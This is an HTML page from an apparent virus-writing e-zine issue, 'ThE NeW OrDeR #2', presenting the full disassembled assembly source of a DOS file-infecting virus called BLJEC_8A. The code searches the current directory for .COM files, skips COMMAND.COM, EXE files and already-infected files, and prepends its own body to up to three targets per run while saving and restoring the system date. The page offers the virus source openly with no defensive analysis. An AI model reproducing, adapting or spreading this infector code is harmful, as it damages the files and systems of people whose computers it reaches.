<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>BLJEC_8A</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>.model tiny<br>
.code<br>
org 100h<br>
kkk:<br>
nop<br>
count db 90h<br>
<br>
mov cx,80h<br>
mov si,0080h<br>
mov di,0ff7fh<br>
rep movsb<br>
<br>
lea ax,begp<br>
mov cx,ax<br>
sub ax,100h<br>
mov ds:[0fah],ax<br>
add cx,fso<br>
mov ds:[0f8h],cx<br>
ADD CX,AX<br>
mov ds:[0f6h],cx<br>
<br>
mov cx,ax<br>
lea si,kkk<br>
mov di,ds:[0f8h]<br>
RB: REP MOVSB<br>
<br>
mov al,3<br>
mov count,al<br>
<br>
mov ah,2ah<br>
int 21h<br>
mov ds:[0f2h],dx<br>
mov ds:[0f4h],cx<br>
<br>
stc<br>
<br>
LEA DX,FFF<br>
MOV AH,4EH<br>
MOV CX,20H<br>
INT 21H<br>
<br>
or ax,ax<br>
jz LLL<br>
jmp done<br>
<br>
LLL:<br>
MOV AH,2FH<br>
INT 21H<br>
<br>
mov ax,es:[bx+1ah]<br>
mov ds:[0fch],ax<br>
add bx,1eh<br>
mov ds:[0feh],bx<br>
<br>
mov ax,'OC'<br>
sub ax,ds:[009eh]<br>
jne cont0<br>
jmp fin<br>
<br>
cont0:<br>
add ax,180h<br>
add ax,ds:[0fah]<br>
add ax,fso<br>
cmp ax,0fff0h<br>
jna cont2<br>
jmp fin<br>
<br>
cont2:<br>
mov cx,ds:[98h]<br>
and cx,001fh<br>
mov dl,cl<br>
mov ax,ds:[98h]<br>
and ax,01e0h<br>
mov cl,5<br>
sar ax,cl<br>
mov dh,al<br>
mov ax,ds:[98h]<br>
and ax,0fe00h<br>
mov cl,9<br>
sar ax,cl<br>
mov cx,ax<br>
add cx,1980<br>
mov ah,2bh<br>
int 21h<br>
<br>
clc<br>
mov ax,3d02h<br>
mov dx,bx<br>
int 21h<br>
<br>
mov bx,ax<br>
mov ah,3fh<br>
mov cx,ds:[0fch]<br>
mov dx,ds:[0f6h]<br>
int 21h<br>
<br>
mov bx,dx<br>
mov ax,[bx]<br>
sub ax,9090h<br>
jz fin<br>
<br>
mov al,'M'<br>
mov di,dx<br>
mov cx,ds:[0fch]<br>
repne scasb<br>
jne cont<br>
mov al,'Z'<br>
cmp es:[di],al<br>
je fin<br>
cont:<br>
MOV AX,ds:[0fch]<br>
mov bx,ds:[0f6h]<br>
mov [bx-2],ax<br>
mov ah,3ch<br>
mov cx,00h<br>
mov dx,ds:[0feh]<br>
clc<br>
int 21h<br>
mov bx,ax ; #<br>
mov ah,40h<br>
mov cx,ds:[0fch]<br>
add cx,ds:[0fah]<br>
mov DX,ds:[0f8h]<br>
int 21h<br>
<br>
<br>
mov ah,3eh<br>
int 21h<br>
<br>
dec count<br>
jz done<br>
<br>
FIN:<br>
stc<br>
mov ah,4fh<br>
int 21h<br>
<br>
or ax,ax<br>
jnz done<br>
<br>
JMP lll<br>
<br>
DONE:<br>
mov dx,ds:[0f2h]<br>
mov cx,ds:[0f4h]<br>
mov ah,2bh<br>
int 21h<br>
<br>
mov cx,80h<br>
mov si,0ff7fh<br>
mov di,0080h<br>
rep movsb<br>
MOV AX,0A4F3H<br>
mov ds:[0fff9h],ax<br>
mov al,0eah<br>
mov ds:[0fffbh],al<br>
mov ax,100h<br>
mov ds:[0fffch],ax<br>
lea si,begp<br>
lea di,kkk<br>
mov ax,cs<br>
mov ds:[0fffeh],ax<br>
mov kk,ax<br>
mov cx,fso<br>
<br>
db 0eah<br>
dw 0fff9h<br>
kk dw 0000h<br>
<br>
fff db '*?.com',0<br>
fso dw 0005h<br>
<br>
<br>
begp:<br>
MOV AX,4C00H<br>
int 21h<br>
<br>
end kkk</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../Images/coollogo_com_21259199.jpg" border="0" width="518"
height="56"></a></p>
</body>
</html>
